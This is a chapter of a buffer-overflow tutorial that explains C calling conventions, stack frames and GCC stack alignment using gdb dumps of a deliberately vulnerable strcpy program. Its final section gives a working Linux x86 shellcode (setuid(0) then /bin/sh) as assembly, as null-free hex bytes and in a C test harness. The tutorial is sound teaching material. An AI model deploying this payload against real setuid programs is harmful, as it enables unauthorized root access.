| < Preparing The Vulnerable Environment | BOF Main Page | Vulnerability & Exploit In Action > |


 

 

 

CHAPTER THREE:

C FUNCTION CALL, STACK & THE SHELLCODE

 

 

 

What is in this section?

3.5   C Function Call Convention

3.6   Stack Boundary Alignment

3.7   Generating and Testing the Shellcode as a Payload

 

 

3.5    C Function Call Convention

 

To understand how the stack operates, it is useful to learn how a function call works and how the stack frame for a function is constructed and destroyed, from the programming language perspective.

As a convention, every C function call [60], [61] creates a stack frame. A convention is a commonly followed practice, not a formally documented and gazetted standard. Compilers follow such conventions for function calls. It is more than a mere convention, however, because, as discussed in section 2.5.3, the conventions used must agree with the processor’s execution environment. For example, the C function calling convention tells the compiler things such as:

 

1.      The order in which function arguments are pushed onto the stack.

2.      Whether the caller or the called function (callee) is responsible for removing the arguments from the stack at the end of the call, that is, the stack cleanup process.

3.      The name-decorating convention that the compiler uses to identify individual functions.

 

Examples of calling conventions used in C compilers are __stdcall, __pascal, __cdecl and __fastcall (for Microsoft Visual C++).  The calling convention is part of a function's signature, so functions with different calling conventions are incompatible with each other.  Currently there is no standard for C name decoration across compiler vendors, or even across versions of the same compiler. That is why object files compiled with different compilers may use different naming schemes and, when linked together, cause unresolved external errors.  For Borland and Microsoft compilers, a specific calling convention can be specified between the return type and the function's name as shown below.

// Borland and Microsoft

void __cdecl MyFunc(float a, char b, char c);

For GNU GCC, write the function declaration followed by the keyword __attribute__, with the calling convention stated in double parentheses, as shown below.

// GNU GCC

void  MyFunc(float a, char b, char c)  __attribute__((cdecl));

The following Table summarizes the C function calling conventions used in modern compilers whether commercial or open source.

 

Table 3.1: C function call convention

 

keyword | Stack cleanup | Parameter passing
__cdecl | caller | Pushes parameters on the stack in reverse order (right to left). The caller cleans up the stack. This is the default calling convention for C and C++ programs, and it supports variadic functions (a variable number or type of arguments, such as printf()). It creates larger executables than __stdcall, because each function call must include stack cleanup code.
__stdcall | callee | Pushes parameters on the stack in reverse order (right to left). Functions that use this calling convention require a function prototype. The callee cleans up the stack. It is the standard convention used by Win32 API functions. It is often equated with __pascal, which also has the callee clean up the stack but pushes parameters left to right.
__fastcall | callee | Arguments are passed in registers when possible (in Microsoft compilers, the first two arguments that fit go in ECX and EDX); the remaining arguments are pushed on the stack. The callee cleans up the stack.

 

Each instance of a function call has its own frame (more generally called an activation record) on the stack. The kinds of data that may appear in an activation record are shown in Figure 3.14 and summarized in Table 3.2. Complete general information and specific programming language implementations can be found in [60], [61].

 

Figure 3.14: A general type of data that might appear in an activation record

 

Table 3.2: Activation record data description

 

Data | Description
Temporary values | Such as those yielded by the evaluation of expressions, in cases where those temporaries cannot be held in registers.
Local data | Data belonging to the function that owns this activation record.
A saved machine status | Information about the state of the machine just before the call to the function. Typically includes the return address (value of the program counter, to which the called function must return) and the contents of registers that were used by the caller and must be restored when the return occurs.
An access link | May be needed to locate data needed by the called function but found elsewhere, e.g. in another activation record.
A control link | Points to the activation record of the caller.
Space for the return value | Space for the return value of the called function, if any. Not all called functions return a value, and if one does, it may be preferable to place that value in a register for efficiency.
The actual parameters | Supplied by the caller. Normally passed in registers, when possible.

 

Specific to C, the code executed by the caller immediately before and after a function call is normally called the calling sequence. The code executed at the beginning of the called function is normally called the prologue, and the code executed at its end is called the epilogue. In practice, C function calls are made with the caller pushing arguments onto the stack, calling the function and then popping the stack to clean up the pushed arguments.  The following generic assembly code snippets show __cdecl and __stdcall examples, which should tally with the processor’s execution environment for stack setup discussed in section 2.5.3.3.

 

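/* example of __cdecl */
push arg_2
push arg_1
call function ; return address pushed, callee sets up its stack frame
add esp, 8    ; stack cleanup by the caller (two 4-byte arguments)
...
function:
sub esp, 12   ; allocate a 12-byte buffer
...
add esp, 12   ; release the buffer
ret           ; arguments are left for the caller to remove

/* example of __stdcall */
push arg_2
push arg_1
call function ; return address pushed, callee sets up its stack frame
/* no stack cleanup here, it is done by the callee */
...
function:
sub esp, 12   ; allocate a 12-byte buffer
...
add esp, 12   ; release the buffer
ret 8         ; return and remove the two 4-byte arguments

These assembly snippets explain how the stack frame is constructed during the function call as depicted in Figure 4. In both cases the called function subtracts 12 bytes from esp to allocate its buffer and adds the 12 bytes back to de-allocate it. With __cdecl the caller then removes the pushed arguments (add esp, 8), whereas with __stdcall the callee removes them as it returns (ret 8). If a calling convention is not explicitly stated or set, the default, __cdecl, is used, which is what most programmers normally rely on. The following figure shows the default calling convention used in the Microsoft Visual Studio IDE.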

 

 

Figure 3.15: C calling convention setting in Microsoft Visual Studio IDE

 

3.6    Stack Boundary Alignment

 

Back to the vulnerable code: note the difference between the buffer that is actually allocated and the buffer that was declared. The program declares an array of 512 bytes, which is supposed to hold a maximum of 512 characters. However, the space the compiler reserves on the stack depends on its preferred stack boundary; the default used is 4 words (16 bytes). This can be verified by disassembling the compiled program.

[amad@localhost projectbof11]$ gdb -q bofvulcode

(gdb) disas main

Dump of assembler code for function main:

0x08048424 <main+0>:    lea    0x4(%esp),%ecx

0x08048428 <main+4>:    and    $0xfffffff0,%esp

0x0804842b <main+7>:    pushl  -0x4(%ecx)

0x0804842e <main+10>:   push   %ebp

0x0804842f <main+11>:   mov    %esp,%ebp

0x08048431 <main+13>:   push   %ecx

0x08048432 <main+14>:   sub    $0x214,%esp

0x08048438 <main+20>:   mov    %ecx,-0x208(%ebp)

0x0804843e <main+26>:   mov    -0x208(%ebp),%eax

0x08048444 <main+32>:   cmpl   $0x1,(%eax)

0x08048447 <main+35>:   jg     0x8048470 <main+76>

0x08048449 <main+37>:   mov    -0x208(%ebp),%edx

0x0804844f <main+43>:   mov    0x4(%edx),%eax

0x08048452 <main+46>:   mov    (%eax),%eax

0x08048454 <main+48>:   mov    %eax,0x4(%esp)

0x08048458 <main+52>:   movl   $0x8048584,(%esp)

0x0804845f <main+59>:   call   0x8048344 <printf@plt>

0x08048464 <main+64>:   movl   $0x0,(%esp)

0x0804846b <main+71>:   call   0x8048354 <exit@plt>

0x08048470 <main+76>:   mov    -0x208(%ebp),%edx

0x08048476 <main+82>:   mov    0x4(%edx),%eax

0x08048479 <main+85>:   add    $0x4,%eax

0x0804847c <main+88>:   mov    (%eax),%eax

0x0804847e <main+90>:   mov    %eax,0x4(%esp)

0x08048482 <main+94>:   lea    -0x204(%ebp),%eax

0x08048488 <main+100>:  mov    %eax,(%esp)

0x0804848b <main+103>:  call   0x8048334 <strcpy@plt>

0x08048490 <main+108>:  lea    -0x204(%ebp),%eax

0x08048496 <main+114>:  mov    %eax,0x4(%esp)

0x0804849a <main+118>:  movl   $0x80485a7,(%esp)

0x080484a1 <main+125>:  call   0x8048344 <printf@plt>

0x080484a6 <main+130>:  mov    $0x0,%eax

0x080484ab <main+135>:  add    $0x214,%esp

0x080484b1 <main+141>:  pop    %ecx

0x080484b2 <main+142>:  pop    %ebp

0x080484b3 <main+143>:  lea    -0x4(%ecx),%esp

0x080484b6 <main+146>:  ret

End of assembler dump.

(gdb)

 

Figure 3.16: Viewing the ‘real’ allocated buffer for the declared array

 

The disassembly shows that main reserves 0x214 (532) bytes of stack space (532 x 8 bits = 4256 bits, or 4256/32 = 133 words) for the 512-byte array, and that the array itself starts at -0x204(%ebp). The default preferred stack boundary for this GCC version is 4, meaning 2 raised to the power of 4, which equals 16 bytes or 128 bits. This default can be changed by using the following GCC option.

-mpreferred-stack-boundary=num

With this option the compiler attempts to keep the stack aligned to a boundary of 2 raised to num bytes. On 32-bit x86 the stack is only required to be aligned on a 4-byte boundary (num = 2); the larger default is a preference of the compiler. Referring to the GCC documentation:

"To ensure proper alignment of these values on the stack, the stack boundary must be as aligned as that required by any value stored on the stack. Further, every function must be generated such that it keeps the stack aligned. Thus calling a function compiled with a higher preferred stack boundary from a function compiled with a lower preferred stack boundary will most likely misalign the stack. It is recommended that libraries that use callbacks always use the default setting.

This extra alignment does consume extra stack space. Code that is sensitive to stack space usage, such as embedded systems and operating system kernels, may want to reduce the preferred alignment to '-mpreferred-stack-boundary=2'."

This matters when the malicious code is stored on the stack itself, as in the classic stack-based buffer overflow. The actual space allocated for the declared array must be known so that the size and arrangement of the input string can be prepared properly. When the return address points back into the stack buffer, two options are available:

 

1.      Use the -mpreferred-stack-boundary=num gcc option to lower the preferred stack boundary or

2.      Pad the shellcode with more No Operation (NOP) instructions.

 

In this demo the preferred stack boundary will be lowered to 2. The steps for this task are shown below.

[amad@localhost projectbof11]$ gcc -w -g -mpreferred-stack-boundary=2 bofvulcode.c -o bofvulcode

[amad@localhost projectbof11]$ gdb -q bofvulcode

(gdb) disas main

Dump of assembler code for function main:

0x08048424 <main+0>:    push   %ebp

0x08048425 <main+1>:    mov    %esp,%ebp

0x08048427 <main+3>:    sub    $0x208,%esp

0x0804842d <main+9>:    cmpl   $0x1,0x8(%ebp)

0x08048431 <main+13>:   jg     0x8048454 <main+48>

0x08048433 <main+15>:   mov    0xc(%ebp),%eax

0x08048436 <main+18>:   mov    (%eax),%eax

0x08048438 <main+20>:   mov    %eax,0x4(%esp)

0x0804843c <main+24>:   movl   $0x8048554,(%esp)

0x08048443 <main+31>:   call   0x8048344 <printf@plt>

0x08048448 <main+36>:   movl   $0x0,(%esp)

0x0804844f <main+43>:   call   0x8048354 <exit@plt>

0x08048454 <main+48>:   mov    0xc(%ebp),%eax

0x08048457 <main+51>:   add    $0x4,%eax

0x0804845a <main+54>:   mov    (%eax),%eax

0x0804845c <main+56>:   mov    %eax,0x4(%esp)

0x08048460 <main+60>:   lea    -0x200(%ebp),%eax

0x08048466 <main+66>:   mov    %eax,(%esp)

0x08048469 <main+69>:   call   0x8048334 <strcpy@plt>

0x0804846e <main+74>:   lea    -0x200(%ebp),%eax

0x08048474 <main+80>:   mov    %eax,0x4(%esp)

0x08048478 <main+84>:   movl   $0x8048577,(%esp)

0x0804847f <main+91>:   call   0x8048344 <printf@plt>

0x08048484 <main+96>:   mov    $0x0,%eax

0x08048489 <main+101>:  leave

0x0804848a <main+102>:  ret

End of assembler dump.

(gdb)

 

Figure 3.17: Viewing the ‘real’ allocated buffer after lowering the preferred stack boundary

This time 0x208 (520) bytes were allocated for the declared 512-byte buffer, which now starts at -0x200(%ebp). This does not affect the program used in this demonstration, because the vulnerable program’s stack is not used to store the malicious shellcode; an environment variable will be used instead. However, this knowledge is important for determining the exact location of the return address (ebp + 4).

 

3.7    Generating and Testing the Shellcode as a Payload

 

The shellcode used in this demo is a typical one that calls setuid and then spawns a shell. Various types of shellcode can be generated easily using the Metasploit framework [52]. Take note that the assembly is written in AT&T syntax, which differs from Intel syntax. This shellcode contains three parts: displaying some characters, executing setuid(0) and invoking /bin/sh. To ensure that the root privilege of the vulnerable setuid program is retained, setuid(0) is run before invoking /bin/sh. The assembly code (testasm.s) is shown in the following listing; it is a modified version of [62]. The comments should be self-explanatory. Assembly is used because it gives a small file size and fast execution.

# using the .data section for write permission

# instead of .text section

.section .data

.globl _start

 

_start:

     # displaying some characters for watermarking :-)

     xor %eax,%eax      # clear eax by setting eax to 0

     xor %ebx,%ebx      # clear ebx by setting ebx to 0

     xor %edx,%edx      # clear edx by setting edx to 0

     push %ebx          # push ebx (0) to null-terminate the string

     push $0xa696e55    # push U-n-i characters

     push $0x4d555544   # push M-U-U-D characters

     push $0x414d4841   # push A-M-H-A characters

     movl  %esp,%ecx    # move the sp to ecx

     movb  $0xf,%dl     # move 15 to dl (low d), it is the

                        # string length,

                        # notice the use of movb - move byte,

                        # this is to avoid null

     movb  $0x4,%al     # move 4 to al (low byte of eax),

                        # 4 is the system call number for

                        # write(int fd, char *str, int len)

     int  $0x80         # call kernel/syscall

     # setuid(0)

     xor %eax,%eax      # clear eax by setting eax to 0

     xor %ebx,%ebx      # clear ebx by setting ebx to 0

     xor %ecx,%ecx      # clear ecx by setting ecx to 0

     movb $0x17,%al     # move 0x17 into al - setuid(0)

     int $0x80          # call kernel/syscall

 

     jmp do_call        # jump to get the address with

                        # the call trick

 

jmp_back:

     pop %ebx           # ebx now has the address of our

                        # string, use it as the base for indexing

     xor %eax,%eax      # clear eax by setting eax to 0

     movb %al,7(%ebx)   # put a null at the N or shell[7]

     movl %ebx,8(%ebx)  # put the address of our string

                        # (in ebx) into shell[8]

     movl %eax,12(%ebx) # put the null at shell[12]

                        # our string now looks something like

                        # "/bin/sh\0(*ebx)(*0000)"

     xor %eax,%eax      # clear eax by setting eax to 0

     movb $11,%al       # put 11, the execve syscall number, into al

     leal 8(%ebx),%ecx  # put the address of XXXX, i.e. (*ebx), into ecx

     leal 12(%ebx),%edx # put the address of YYYY, i.e. (*0000), into edx

     int $0x80          # call kernel/syscall

 

do_call:

     call jmp_back

 

shell:

     .ascii "/bin/shNXXXXYYYY"

 

Figure 3.18: The shellcode file content screenshot

 

Next, assemble, link and run the assembly program to verify that it does what is intended. The following steps show how to assemble the source, link the object file and run the binary.

[amad@localhost testassembly]$ as testasm.s -o testasm.o

[amad@localhost testassembly]$ ld testasm.o -o testasm

[amad@localhost testassembly]$ ./testasm

AHMADUUMUni

sh-3.2$ pwd

/home/amad/Public/testassembly

sh-3.2$ exit

exit

It looks like the assembly works fine. Next, to get the opcodes, the binary needs to be dumped using the objdump tool. These opcodes will be used in the next C program as a char array of hex values. Take note that the assembly code can be used directly in a C program with the asm keyword; however, the program will be larger. The following listing shows the steps.

[amad@localhost testassembly]$ objdump -D testasm

testasm:     file format elf32-i386

Disassembly of section .data:

 

08049054 <_start>:

 8049054: 31 c0                   xor    %eax,%eax

 8049056: 31 db                   xor    %ebx,%ebx

 8049058: 31 d2                   xor    %edx,%edx

 804905a: 53                      push   %ebx

 804905b: 68 55 6e 69 0a          push   $0xa696e55

 8049060: 68 44 55 55 4d          push   $0x4d555544

 8049065: 68 41 48 4d 41          push   $0x414d4841

 804906a: 89 e1                   mov    %esp,%ecx

 804906c: b2 0f                   mov    $0xf,%dl

 804906e: b0 04                   mov    $0x4,%al

 8049070: cd 80                   int    $0x80

 8049072: 31 c0                   xor    %eax,%eax

 8049074: 31 db                   xor    %ebx,%ebx

 8049076: 31 c9                   xor    %ecx,%ecx

 8049078: b0 17                   mov    $0x17,%al

 804907a: cd 80                   int    $0x80

 804907c: eb 18                   jmp    8049096 <do_call>

 

0804907e <jmp_back>:

 804907e: 5b                      pop    %ebx

 804907f: 31 c0                   xor    %eax,%eax

 8049081: 88 43 07                mov    %al,0x7(%ebx)

 8049084: 89 5b 08                mov    %ebx,0x8(%ebx)

 8049087: 89 43 0c                mov    %eax,0xc(%ebx)

 804908a: 31 c0                   xor    %eax,%eax

 804908c: b0 0b                   mov    $0xb,%al

 804908e: 8d 4b 08                lea    0x8(%ebx),%ecx

 8049091: 8d 53 0c                lea    0xc(%ebx),%edx

 8049094: cd 80                   int    $0x80

 

08049096 <do_call>:

 8049096: e8 e3 ff ff ff          call   804907e <jmp_back>

 

0804909b <shell>:

 804909b: 2f                      das

 804909c: 62 69 6e                bound  %ebp,0x6e(%ecx)

 804909f: 2f                      das

 80490a0: 73 68                   jae    804910a <_end+0x5e>

 80490a2: 4e                      dec    %esi

 80490a3: 58                      pop    %eax

 80490a4: 58                      pop    %eax

 80490a5: 58                      pop    %eax

 80490a6: 58                      pop    %eax

 80490a7: 59                      pop    %ecx

 80490a8: 59                      pop    %ecx

 80490a9: 59                      pop    %ecx

 80490aa: 59                      pop    %ecx

[amad@localhost testassembly]$


Figure 3.19: Dumping the Hex representation using objdump tool

 

Then, arrange the opcodes as a string of hex bytes. There must be no null byte, \x00 (the string terminator), in this shellcode, because a string function such as strcpy() stops copying at the first null and the shellcode would be cut short. In a real exploit, the shellcode should be as small as possible, because the space available for storing it is usually limited; a smaller shellcode also executes faster.

"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"

"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"

"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"

"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"

"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

"\x58\x58\x58\x58\x59\x59\x59\x59"

Next, use this shellcode as a char array in the C program (testmyasm.c) for testing as shown in the following code.

#include <stdlib.h>     /* exit() */

#include <unistd.h>

 

char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55"

"\x55\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31"

"\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43"

"\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53"

"\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e"

"\x58\x58\x58\x58\x59\x59\x59\x59";

 

int main(int argc, char **argv)

{

     int (*ret)();           /* declare a function pointer, ret */

     ret = (int(*)())shcode; /* ret points to our shellcode, */

                             /* cast to a function pointer */

     (int)(*ret)();          /* call shcode[] as a function */

     exit(0);                /* exit peacefully */

}

Then, compile and run this program as shown in the following steps.

[amad@localhost testassembly]$ gcc -w -g testmyasm.c -o testmyasm

[amad@localhost testassembly]$ ./testmyasm

AHMADUUMUni

sh-3.2$ id

uid=500(amad) gid=500(amad) groups=500(amad)

sh-3.2$ whoami

amad

sh-3.2$

sh-3.2$

sh-3.2$ exit

exit

[amad@localhost testassembly]$

Figure 3.20 shows the screenshot for the previous task.

 

 

Figure 3.20: Screenshot for the shellcode testing

 

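The shellcode works fine. The NXXXXYYYY portion after /bin/sh only made the assembly coding easier, by marking where the null byte and the two pointers go and by reserving the necessary space. Because the shellcode writes those values itself at run time, the placeholder bytes can be discarded, as long as the memory just after the string is writable. After removing that part of the string, the remaining shellcode is shown below.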

"\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"

"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"

"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"

"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"

"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

Re-compile and re-run the program with this slightly smaller shellcode.

[amad@localhost testassembly]$ cat asmshellcodefinal.c

#include <unistd.h>

 

char shcode[] = "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x55\x6e\x69\x0a\x68\x44\x55\x55"

"\x4d\x68\x41\x48\x4d\x41\x89\xe1\xb2\x0f\xb0\x04\xcd\x80\x31\xc0"

"\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x18\x5b\x31\xc0\x88\x43\x07"

"\x89\x5b\x08\x89\x43\x0c\x31\xc0\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c"

"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

 

int main(int argc, char **argv)

{

        int (*ret)();

        ret = (int(*)())shcode;

        (int)(*ret)();

        exit(0);

}

[amad@localhost testassembly]$ gcc -w -g asmshellcodefinal.c -o asmshellcodefinal

[amad@localhost testassembly]$ ./asmshellcodefinal

AHMADUUMUni

sh-3.2$

sh-3.2$

sh-3.2$ id

uid=500(amad) gid=500(amad) groups=500(amad)

sh-3.2$ whoami

amad

sh-3.2$ exit

exit

[amad@localhost testassembly]$

 

Figure 3.21: Running the shellcode screenshot

 

Well, the shellcode looks fine.

 

 

 


 
